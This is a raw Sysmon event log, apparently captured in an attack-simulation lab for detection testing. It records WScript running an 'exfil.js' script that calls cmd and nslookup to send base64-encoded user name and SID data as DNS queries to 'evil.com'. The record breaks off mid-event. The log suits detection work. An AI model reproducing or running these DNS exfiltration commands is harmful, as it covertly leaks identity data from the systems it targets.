23542300x8000000000000000215822Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.852{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlxnphknq.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215821Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.837{2E1864BB-18FF-629A-7046-000000005F02}76326408C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-7146-000000005F02}7352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215820Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215819Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215818Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.821{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7146-000000005F02}7352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215817Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215816Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.821{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215815Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.821{2E1864BB-18FF-629A-6F46-000000005F02}74281036C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-7146-000000005F02}7352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.829{2E1864BB-18FF-629A-7146-000000005F02}7352C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-6F46-000000005F02}7428C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxnphknq.tmp 2>&1 10341000x8000000000000000215813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.806{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-7046-000000005F02}7632C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.806{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-7046-000000005F02}7632C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.806{2E1864BB-18FF-629A-7046-000000005F02}76326408C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6F46-000000005F02}7428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.803{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-7046-000000005F02}7632C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.783{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.783{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.783{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.783{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.783{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6F46-000000005F02}7428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.783{2E1864BB-18E0-629A-6742-000000005F02}39763536C:\Windows\System32\WScript.exe{2E1864BB-18FF-629A-6F46-000000005F02}7428C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.797{2E1864BB-18FF-629A-6F46-000000005F02}7428C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxnphknq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000215802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.783{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpjbn.tmpMD5=EE0F2C575C28024B257C8FA561A930FF,SHA256=609D891407BB69D11081AC946B86D51A56F6BAC0645721CD4B5620AA4DCA480C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000215801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.752{2E1864BB-18FF-629A-6D46-000000005F02}27885232C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6E46-000000005F02}6888C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.752{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.752{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.752{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.752{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.752{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18FF-629A-6E46-000000005F02}6888C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.752{2E1864BB-18FF-629A-6C46-000000005F02}78087452C:\Windows\system32\cmd.exe{2E1864BB-18FF-629A-6E46-000000005F02}6888C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.763{2E1864BB-18FF-629A-6E46-000000005F02}6888C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FF-629A-6C46-000000005F02}7808C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpjbn.tmp 2>&1 10341000x8000000000000000215793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.737{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6D46-000000005F02}2788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.737{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FF-629A-6D46-000000005F02}2788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:51.737{2E1864BB-18FF-629A-6D46-000000005F02}27885232C:\Windows\system32\conhost.exe{2E1864BB-18FF-629A-6C46-000000005F02}7808C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 